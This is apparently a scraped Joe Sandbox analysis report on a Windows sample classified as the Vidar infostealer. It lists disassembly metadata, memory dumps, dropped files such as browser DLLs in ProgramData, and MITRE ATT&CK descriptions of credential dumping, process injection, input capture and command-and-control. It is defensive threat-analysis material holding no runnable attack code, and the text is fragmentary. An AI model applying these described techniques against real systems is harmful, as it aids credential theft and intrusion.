Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3158253471-631824599
Opcode ID: 1a92e6702694ddfeff45d2a97decf7b151b32dbdc060b41228c13f47131b6274
Instruction ID: 7466417a8dd198f8be48e4ee3475cac2c6508c3a95c605cdc4f2ca013a68960f
Opcode Fuzzy Hash: 1a92e6702694ddfeff45d2a97decf7b151b32dbdc060b41228c13f47131b6274
Instruction Fuzzy Hash: D3E092B06003158FD330AF35E4057467BE5BF08304F00991DE486DA742EBB4E544DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00EB0251 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 00EB0091

Part of subcall function 00EEC6D9: LoadLibraryA.KERNEL32(kernel32.dll,?,00EB027A,?), ref: 00EEC6E7
Part of subcall function 00EEC6D9: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00EEC6F9

FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00EB0289

Strings

WIN_XPe, xrefs: 00EB00A4

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Library$AddressDirectoryFreeLoadProcSystem
String ID: WIN_XPe
API String ID: 582185067-3257408948
Opcode ID: 109ed36cafd4451c46750a74459d23aaff15a6a84f6ddcb1ee9c05f41981e666
Instruction ID: f60b99633d7d01a1cceedbbdc57fa2289b880e59021b1b6c56ce5098318584b4
Opcode Fuzzy Hash: 109ed36cafd4451c46750a74459d23aaff15a6a84f6ddcb1ee9c05f41981e666
Instruction Fuzzy Hash: 6EF06D7080410DDFCB15EBA4C988BEEBBF8BB08304F246485E146B20A0CB715F80EF20

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 0dN59ZIkEM.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

HIPS / PFW / Operating System Protection Evasion

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\BFHJJJDAFBKEBGDGHCGDBKJECF

C:\ProgramData\CBKJJJDH

C:\ProgramData\CFIEHCFIECBGCBFHIJJKEGHIEC

C:\ProgramData\CGCFBFBGHDGDAKECAKJEHCGDAA

C:\ProgramData\DGDAEHCB

C:\ProgramData\GIIDBGDAFHJDHIDGDGII

C:\ProgramData\HCAEGCBF

C:\ProgramData\HCAEGCBFHJDG\freebl3.dll

C:\ProgramData\HCAEGCBFHJDG\mozglue.dll

C:\ProgramData\HCAEGCBFHJDG\msvcp140.dll

Windows Analysis Report
0dN59ZIkEM.exe

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre